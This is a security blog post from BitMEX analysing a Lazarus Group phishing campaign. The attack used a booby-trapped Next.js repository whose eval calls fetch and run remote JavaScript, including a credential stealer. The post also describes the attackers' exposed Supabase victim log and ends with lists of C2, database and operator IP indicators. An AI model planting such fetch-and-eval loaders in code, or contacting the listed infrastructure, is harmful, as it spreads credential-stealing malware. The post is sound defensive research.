Beyond the Pond Phish Unraveling Lazarus Groups Evolving Tactics BitMEX Blog

pThe Lazarus Group is a prominent hacking group associated with the North Korean government with a long history of targeting companies and individuals within the cryptocurrency space They have been linked to the breaches of Phemex WazirX Bybit Stake among othersppOur security team frequently responds to attempts to attack us many of which use techniques or infrastructure that have been tied to the Lazarus Group by other researchersppA common pattern in their major operations is the use of relatively unsophisticated methods often starting with phishing to gain a foothold in their targets systemsppFor example in the Bybit breach the group tricked a Safe Wallet employee into running malicious code on their computer to establish initial access Once this foothold was obtained what looks like a more sophisticated division of the group took over and continued postexploitation obtaining access to Safes AWS account and modifying the wallets frontend source code which resulted in the ultimate theft of their cold walletsppThroughout the last few years it appears that the group has divided into multiple subgroups that are not necessarily of the same technical sophistication This can be observed through the many documented examples of bad practices coming from these frontline groups that execute social engineering attacks when compared to the more sophisticated postexploitation techniques applied in some of these known hacksppRecently a BitMEX employee was contacted through LinkedIn for a potential NFT Marketplace web3 project collaboration This pretext was similar enough to other attacks common in this industry that the employee suspected it was an attempt to trick them into running malicious code on their device They alerted the security team who investigated with the objective of understanding how this campaign worked and how to protect ourselves from itppThe interaction is pretty much known if you are familiar with Lazarus tactics After some back and forth with the attacker our employee was invited to a private GitHub repository which contained code for a NextjsReact website The goal was to make the victim run the project which includes malicious code on their computer After a few minutes of inspection of the repository just grepping for eval really we found some very suspicious pieces of codeppppThe first instance of calls to the eval function was commented out suggesting this code was used in a previous campaign or was an older version of the malicious code being distributed If it was not commented out it would send a HTTP request to hxxpregionchecknetapiuserthirdcookiev3726 and execute the responses cookie value This domain has been previously attributed to the Lazarus Group by Palo Altos Unit 42ppppThe second eval call we found was not commented out The code here sends a HTTP request to hxxpfashdefistore6168defyv5 and executes the JavaScript code returned by the serverppWe then sent this request out manually and saved its response for further analysis The JavaScript code returned by the server was obfuscated making it hard to analyse at a glanceppTo understand what this is really doing we used webcrack a JavaScript deobfuscation tool which yields a slightly better unminified versionppThis javascript file looked like a result of joining three different scripts together We can see multiple code blocks that separate the different stages of the malwareppppAt first glance the second part of the script contained strings that were similar to what we would expect from a credential stealer references to Chrome extension IDs and to other BrowsersppThis pzi string looked familiar to us as well even without deobfuscating the code it is similar to other pieces of malware that have been previously tied to the DPRK and resembles the BeaverTail campaign originally described by Palo Altos Unit 42 in this report Since Unit 42 has already extensively analysed this second component we will not cover it hereppppAfter getting confirmation of who we were dealing with we decided to continue deobfuscating the code in an attempt to dig some IoCs that could be added to our internal toolsppJavaScript deobfuscation is pretty fun once you know the patterns the obfuscation tools use and usually boils down to finding and replacing references to array strings or calls to decryption functions and renaming variables Starting from the first code block we manually replaced all of the references to a string array with their corresponding values and used webcracks symbol renaming tool to rename variables based on their context which results in humanreadable codeppppAs this was not our first time reverse engineering malware related to this kind of campaign we were already reasonably familiar with the code However this initial part of the file was new to us it connects to a Supabase instance and writes metadata username hostname os ip geolocation time about the computer that has been infectedppSupabase is a free managed database service akin to Googles Firebase It allows developers to quickly set up databases that have easytouse interfaces for applications which if configured properly allow you to implement almost all functionality that would usually be tied to an API layer such as authentication access control etc without the need for oneppA common issue with these services is that developers do not take the time to configure permissions properly and end up leaving significant parts of the database accessible to anyone With this in mind it was one of the first things we decided to test using this simple scriptppppTo our surprise at the time this returned 37 records with data from computers that had previously been compromisedppppIf we take a closer look at the data some logs stand out a lot of usernamehostname combinations are repeated and some of those have patterns that look like test runs potentially done by developers We also see a pattern with many hostnames of the form of 3XXXppThe IP addresses logged for these entries mostly belong to VPN providers One of the recurring usernames Victor consistently uses IP addresses that appear to be managed by Touch VPN while GHOST72 uses IP addresses that map to Astrill VPN servers source spurusppBy looking at the logs for Victor we found an entry that stands out the IP address and location do not match the previously observed Touch VPN exit nodes but rather a residential China Mobile IP address 22310414497 located in Jiaxing China We believe that this was an operational security mistake which ended up leaking the attackers original IP addressppOnce we had this information we created a simple program that would query this database on a regular basis and log new infections with the goal of understanding the general profile of victims and potentially spotting new mistakes by the operators This program has been running since May 14 2025 and our data has all logs dating back to March 31st So far this amounts to 856 entries with 174 unique userhostname combinationsppUnique new infections by day UTCppBy looking at the username hostname and IPs of past infections we were also able to identify other computers and accounts used to test or develop the malware used in this campaignppWith these hostnames in mind we can also plot a chart that shows active hours for the operators behind this campaignppInterestingly we identified a consistent period of downtime for the operators from 8am to 1pm UTC 5pm to 10pm Pyongyang time which suggests that they do have a structured schedule or consistent working hours with activity occurring throughout the rest of the 24hour cycleppppInvestigating this Lazarus Group campaign shows a stark contrast between their entrylevel phishing strategies and advanced postexploitation techniques The accidental exposure of the Supabase database revealed not only their tracking methods but also significant lapses in operational security such as the leakage of Chinese IP addresses offering interesting insights about the inner workings of the groupppIf you want to get in touch with us regarding this topic or the idea of working in an organisation that investigates these kinds of attacks interests you contact securityresearch at bitmex dot comppSupabase URLpphttpsmkswbddldpyiqkyusupabasecoppC2 URLpphttp1441729635ppThreat Actor Victor3KZHpp107182231193 107182231196 1202262228 1841745149 22310414497 311318910 3113189178 37120216226 3813414894 45141153154 89116158156 89116158164 89116158188 89116158228 8911615868ppThreat Actor Victor3KZH1pp107182231196 311318910 311318926 38132106130 45141153130 89116158156 89116158228 8911615868 8911615884ppThreat Actor GHOST723UJS2pp10818157127 195146531 19916811331 8918718511ppThreat Actor ghostGHOST3pp129232193253 195146531 209127117234 455619779ppThreat Actor GoldRockDESKTOPN4VEL23pp3817018110ppThreat Actor Lenovo3RKSpp3817018110ppThreat Actor Super3AHR2pp21713819834 89187161220ppThreat Actor degenAllipp1678861148ppThreat Actor firebird3KJHpp14670632pp ppPlatform StatusppView Status PageppCrypto Trader DigestppBitcoins most indepth market analysis commentary and insightsppSignup to receive the latest articles delivered straight to your inboxppTrade moreppBitMEX offers a variety of contract types All contracts are bought and paid out in Bitcoin BitMEX created the Perpetual Contract a high leverage contract that never expiresppRegister your free accountppCurious about life at BitMEXppWe are hiring motivated selfstarters to work on challenging problem setsppView open careersppThe Next Generation of Bitcoin Trading ProductsppUp to 100x leverage Trading without expiry dates Industryleading securityppWelcome to Bitcoins most advanced trading platformppView Live TradingppThis blog is operated by HDR Global Trading Limited a company incorporated under the International Business Companies Act of 1994 of the Republic of Seychelles with a company number of 148707 and registered address at Global Gateway 8 Rue de la Perle Providence Mahé Seychelles HDR HDR wholly owns BitMEX a virtual asset trading platformppAccess to trading or holding positions on BitMEX is prohibited for any person or entity that is located incorporated or otherwise established in or a citizen or a resident of listed locations as defined in the Restricted Jurisdiction Policy including the United States of America If it is determined that any BitMEX user has given false representations as to their location incorporation establishment citizenship or residence or HDR detects a user is from a Restricted Jurisdiction as defined in the Restricted Jurisdiction Policy HDR reserves the right to immediately close their accounts and liquidate any open positions HDR may in its sole discretion update the Restricted Jurisdiction Policy and implement controls to restrict access to the BitMEX trading platform in any of the Restricted Jurisdictions By accessing and reviewing this blog i you agree to the disclaimers set down below and ii warrant and represent that you are not located incorporated or otherwise established in or a citizen or a resident of any locations listed in the Restricted Jurisdiction Policy The material posted on this blog should not form the basis for making investment decisions nor be construed as a recommendation or advice to engage in investment transactions and is not related to the provision of advisory services regarding investment tax legal financial accounting consulting or any other related services nor are advice or recommendations being provided to buy sell or purchase any good or productppAny views expressed in or on BitMEX Research reports are the personal views of the authors HDR or any affiliated entity has not been involved in producing these reports and the views contained in these reports may differ from the views or opinions of HDR or any affiliated entity The information and data herein have been obtained from sources we believe to be reliable Such information has not been verified and we make no representation or warranty as to its accuracy completeness or correctness Any opinions or estimates herein reflect the judgment of the authors of the report at the date of this communication and are subject to change at any time without notice HDR or any affiliated entity will not be liable whatsoever for any direct or consequential loss arising from the use of including any reliance on this blog or its contents The content of this blog is protected by copyrightppppBitMEX is a P2P cryptoproducts trading platformppBitMEX and the mobile apps issued under BMEX are wholly owned and operated by HDR Global Trading Limited a Republic of Seychelles incorporated entity or its relevant authorised affiliatesppUS Persons are prohibited from accessing the services of the BitMEX trading platformppCryptocurrency charts by TradingViewp